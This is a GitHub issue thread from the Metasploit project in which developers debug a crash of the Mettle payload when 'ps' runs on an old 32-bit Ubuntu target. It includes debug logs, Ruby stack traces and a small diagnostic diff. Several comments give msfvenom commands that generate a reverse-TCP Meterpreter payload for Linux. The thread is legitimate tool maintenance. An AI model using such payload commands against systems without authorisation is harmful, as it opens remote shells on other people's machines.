### ISSUE TITLE
mettle gets disconnected from msf when 'ps' is run in a certain environment

### ISSUE THREAD

**Issue by Viss** [rapid7/metasploit-framework#8219]
## Steps to reproduce

How'd you do it?

1. generate a mettle payload (linux/mettle/reverse_tcp)
2. obtain a shell
3. once in shell, type 'sysinfo' or 'help, it seems to function
4. type 'ps' and the binary crashes and the shell dies.

It would appear the problem is with the binary itself, not msf on the attack side.

### Metasploit version
Framework: 4.14.6-dev-11b251b
Console  : 4.14.6-dev-11b251

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ X ] Source install (please specify ruby version) - Ruby 2.3.4

### OS
Ubuntu

**Comment by h00die** [comment]
from IRC tonight: 
<Viss> linux box, ubuntu super old kernel, 3.13, i686
./msfvenom -p linux/x86/mettle/reverse_tcp LHOST=xxx LPORT=xxx -f elf -a x86

**Comment by busterb** [comment]
Hmm, running on 3.2 here, works fine. Even just ran autoroute, which probably should have been in 'multi' in the first place, since there's nothing OS-specific about it at all.

```
msf post(autoroute) > run

[*] Running module against 10.0.2.15
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.2.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
```

**Comment by busterb** [comment]
Can you get an idea of what 'ps' or 'route' would be on this target device (perhaps via a different means)? I suspect it has much less to do with target architecture, and more to do with doing something funning in the process parser for some particular workload on your target.

**Comment by Viss** [comment]
well it's just an older ubuntu box.

![image](https://cloud.githubusercontent.com/assets/1756255/24892328/94606474-1e30-11e7-92be-89b354313a27.png)

**Comment by Viss** [comment]
![image](https://cloud.githubusercontent.com/assets/1756255/24892437/79edfd08-1e31-11e7-8bff-186cb77f4fae.png)

**Comment by Viss** [comment]
I'm now going to attempt msfupdate to bring this install to absolute current to see if that matters.

**Comment by busterb** [comment]
-h isn't working from the meterpreter script either? that's also odd. msf is running in linux? osx?

**Comment by Viss** [comment]
![image](https://cloud.githubusercontent.com/assets/1756255/24892577/7a7a96fe-1e32-11e7-9cf9-e14b9344989d.png)

**Comment by Viss** [comment]
err, well these errors are actually from python meterpreter. this issue is about mettle just 'dying', let me go back and get proper screenshots for mettle.

**Comment by Viss** [comment]
same error
![image](https://cloud.githubusercontent.com/assets/1756255/24892631/f57d41bc-1e32-11e7-87fc-2a75279b399d.png)

**Comment by Viss** [comment]
whoa, okay, it seems to work via the postmodule when outside of meterp
![image](https://cloud.githubusercontent.com/assets/1756255/24892645/0a3066ac-1e33-11e7-92cd-9e0ec08c2d4f.png)

**Comment by busterb** [comment]
yeah - the meterpreter script seems to have 'usage()' defined in the wrong place. that's an easy fix

**Comment by busterb** [comment]
2 items resolved in #8221

**Comment by Viss** [comment]
if you do 'ps' on your end in a mettle shell does it murder the shell? cuz on this instance it segfaults.

**Comment by busterb** [comment]
nope, but it might be failing parsing a specific process on this target host that I don't have (it's a pretty bare Ubuntu 12.04 install)

**Comment by busterb** [comment]
Hmm, just realized I'm running a 32-bit payload on a 64-bit host, will try switching to all 32-bit.
If you can upload a stageless payload, we can enable debug further:

./msfvenom -p linux/x86/mettle_reverse_tcp LHOST=xxx LPORT=xxx -f elf -a x86

Then run the payload with '-dd' as command-line flags. It should log everything that's happening.

**Comment by Viss** [comment]
okiedokie

**Comment by Viss** [comment]
so via stdout i get some text, but I can't get it to give me any data via regular redirection. 
I do see that its being 'killed', and I see this in kern.log

`kernel: [20889.374880] mettle[3057]: segfault at b ip bf9e2c15 sp bf9e2c4c error 6`

**Comment by busterb** [comment]
Well, that still works for me too. Will play with better ways to murder the process lister tomorrow.

**Comment by Viss** [comment]
im having REAL trouble trying to get it to redirect output. is there a possibility you could create a flag that would have it write to a file on its own vs stdout?

**Comment by busterb** [comment]
got you covered, use the '-o' flag
```
vagrant@vagrant-ubuntu-precise-32:/vagrant$ ./test.elf -h
Usage: mettle [options]
  -h, --help        display help
  -u, --uri [uri]   add connection URI
  -U, --uuid [uuid] set the UUID (base64)
  -d, --debug       enable debug output
  -o, --out [file]  write debug output to a file
```

**Comment by Viss** [comment]
hot. standby

**Comment by Viss** [comment]
this is the bottom bit of the log, omitting ips and whatnot.

```
[04-11-2017 10:13:58.870s] [tlv.c:556] processing method: 'core_machine_id' id: '82727738721365402743543149726161'
[04-11-2017 10:13:59.064s] [tlv.c:556] processing method: 'core_enumextcmd' id: '28523748694827473309287643451406'
[04-11-2017 10:13:59.239s] [tlv.c:556] processing method: 'stdapi_sys_config_getuid' id: '82302416041023917516645270598834'
[04-11-2017 10:13:59.408s] [tlv.c:556] processing method: 'stdapi_sys_config_sysinfo' id: '09736122808488017453471608671547'
[04-11-2017 10:13:59.577s] [tlv.c:556] processing method: 'stdapi_net_config_get_interfaces' id: '43045711647470142934172596719671'
[04-11-2017 10:13:59.577s] [stdapi/net/config.c:46] lo: 127.0.0.1/8
[04-11-2017 10:13:59.577s] [stdapi/net/config.c:46] lo: ::1
[04-11-2017 10:13:59.577s] [stdapi/net/config.c:46] eth0: 192.168.2.149/24
[04-11-2017 10:13:59.577s] [stdapi/net/config.c:46] eth0: fe80::983f:f8ff:fe5c:41c1/64
[04-11-2017 10:13:59.748s] [tlv.c:556] processing method: 'stdapi_net_config_get_routes' id: '05726974149099194596251437325333'
[04-11-2017 10:14:03.331s] [mettle.c:72] Heartbeat
[04-11-2017 10:14:08.331s] [mettle.c:72] Heartbeat
[04-11-2017 10:14:12.202s] [tlv.c:556] processing method: 'stdapi_sys_process_get_processes' id: '45929297470479719508722379930162'
[04-11-2017 10:14:12.703s] [tlv.c:556] processing method: 'core_shutdown' id: '73100521327401468203890441428686'
```

**Comment by busterb** [comment]
Huh, its actually getting a shutdown message from msf. Committing a SIGSEGV is the 3rd thing it will try to kill itself with, if exit(0) and SIGKILL don't occur in time.

**Comment by Viss** [comment]
thats... bizzare

**Comment by busterb** [comment]
could you put a stack trace in msf's core_shutdown method so we could see who dunnit? Add a line like this:

```
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 479102b788..9af7f398c4 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -595,6 +595,7 @@ class ClientCore < Extension
   # Shuts the session down
   #
   def shutdown
+    $stderr.puts caller
     request  = Packet.create_request('core_shutdown')

     if client.passive_service
```

**Comment by Viss** [comment]
I made this change but I'm not sure where I'm supposed to see output. No extra errors or logs show up in msfconsole and the output in the mettle debug log appears exactly the same.

**Comment by busterb** [comment]
Interesting. This was supposed to have shown a stack trace when the core_shutdown command was sent from msf. This is a live target right? I wonder if the core_shutdown is being injected by an intermediary.

```
[*] 10.0.2.15 - Meterpreter session 1 closed.  Reason: User exit
/Users/bcook/rapid7/metasploit-framework/lib/rex/post/meterpreter/client.rb:97:in `cleanup_meterpreter'
/Users/bcook/rapid7/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:205:in `cleanup'
/Users/bcook/rapid7/metasploit-framework/lib/msf/core/session_manager.rb:275:in `deregister'
/Users/bcook/rapid7/metasploit-framework/lib/msf/core/session/interactive.rb:140:in `_interact_complete'
/Users/bcook/rapid7/metasploit-framework/lib/rex/ui/interactive.rb:72:in `interact'
/Users/bcook/rapid7/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1347:in `cmd_sessions'
/Users/bcook/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in `run_command'
/Users/bcook/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in `block in run_single'
/Users/bcook/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `each'
/Users/bcook/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `run_single'
/Users/bcook/rapid7/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:141:in `cmd_exploit'
/Users/bcook/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in `run_command'
/Users/bcook/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in `block in run_single'
/Users/bcook/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `each'
/Users/bcook/rapid7/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `run_single'
/Users/bcook/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:248:in `block in initialize'
/Users/bcook/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:247:in `each'
/Users/bcook/rapid7/metasploit-framework/lib/msf/ui/console/driver.rb:247:in `initialize'
/Users/bcook/rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
/Users/bcook/rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
/Users/bcook/rapid7/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/Users/bcook/rapid7/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
```

**Comment by Viss** [comment]
yes, it's a live target. I still have a shell.
i changed that one line in client_core.rb, restarted msf, tried again
let me give it one more shot.

**Comment by Viss** [comment]
ah, the change didn't take. the addition for like 595 didn't stick (?!?!)
trying again.

**Comment by Viss** [comment]
```
[*] 192.168.2.149 - Meterpreter session 3 closed.  Reason: Died
/root/tools/metasploit-framework/lib/rex/post/meterpreter/client.rb:97:in `cleanup_meterpreter'
/root/tools/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:205:in `cleanup'
/root/tools/metasploit-framework/lib/msf/core/session_manager.rb:275:in `deregister'
/root/tools/metasploit-framework/lib/msf/core/session_manager.rb:95:in `block (2 levels) in initialize'
/root/tools/metasploit-framework/lib/msf/core/session_manager.rb:93:in `each'
/root/tools/metasploit-framework/lib/msf/core/session_manager.rb:93:in `block in initialize'
/root/tools/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
```

**Comment by busterb** [comment]
Is that the whole backtrace?

**Comment by Viss** [comment]
Yup, and then my other shells died.
I had to go pull that line out and restart msf.
![image](https://cloud.githubusercontent.com/assets/1756255/24927483/06fb43f4-1eb4-11e7-8a97-151fdd71cc0c.png)

**Comment by busterb** [comment]
That gives me a good clue then. Can you please run:

'set LogLevel 2'

and try again? Luckily the 3 sites where metasploit kills its own sessions have a unique debug log signature so I'll be able to see which one it is.

**Comment by busterb** [comment]
the actual log message may show up in framework.log. I suspect mettle is sending some piece of data that framework doesn't like, there is a mis-parse, then the connection gets shut down.

**Comment by Viss** [comment]
Same output to console:
```
[*] 192.168.2.149 - Meterpreter session 2 closed.  Reason: Died
/root/tools/metasploit-framework/lib/rex/post/meterpreter/client.rb:97:in `cleanup_meterpreter'
/root/tools/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:205:in `cleanup'
/root/tools/metasploit-framework/lib/msf/core/session_manager.rb:275:in `deregister'
/root/tools/metasploit-framework/lib/msf/core/session_manager.rb:95:in `block (2 levels) in initialize'
/root/tools/metasploit-framework/lib/msf/core/session_manager.rb:93:in `each'
/root/tools/metasploit-framework/lib/msf/core/session_manager.rb:93:in `block in initialize'
/root/tools/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
```

This was in framework.log

```
[04/11/2017 16:23:12] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop
[04/11/2017 16:24:01] [w(0)] core: Session 2 has died
[04/11/2017 16:24:04] [e(0)] meterpreter: Error running command ps: Interrupt
[04/11/2017 16:24:04] [d(0)] meterpreter: Call stack:
/root/tools/metasploit-framework/lib/rex/post/meterpreter/packet_response_waiter.rb:107:in `sleep'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/packet_response_waiter.rb:107:in `wait'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/packet_response_waiter.rb:107:in `block (2 levels) in wait'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/packet_response_waiter.rb:106:in `loop'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/packet_response_waiter.rb:106:in `block in wait'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/packet_response_waiter.rb:104:in `synchronize'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/packet_response_waiter.rb:104:in `wait'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:242:in `send_packet_wait_response'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:200:in `send_request'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:222:in `get_processes'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:592:in `cmd_ps'
/root/tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in `run_command'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:105:in `run_command'
/root/tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in `block in run_single'
/root/tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `each'
/root/tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `run_single'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
/root/tools/metasploit-framework/lib/rex/ui/text/shell.rb:195:in `run'
/root/tools/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
/root/tools/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:481:in `_interact'
/root/tools/metasploit-framework/lib/rex/ui/interactive.rb:49:in `interact'
/root/tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1347:in `cmd_sessions'
/root/tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in `run_command'
/root/tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in `block in run_single'
/root/tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `each'
/root/tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `run_single'
/root/tools/metasploit-framework/lib/rex/ui/text/shell.rb:205:in `run'
/root/tools/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/root/tools/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'

```

**Comment by busterb** [comment]
This is fixed by #8250. Was able to reproduce running mettle on an old zipit z2 instant messenger :)
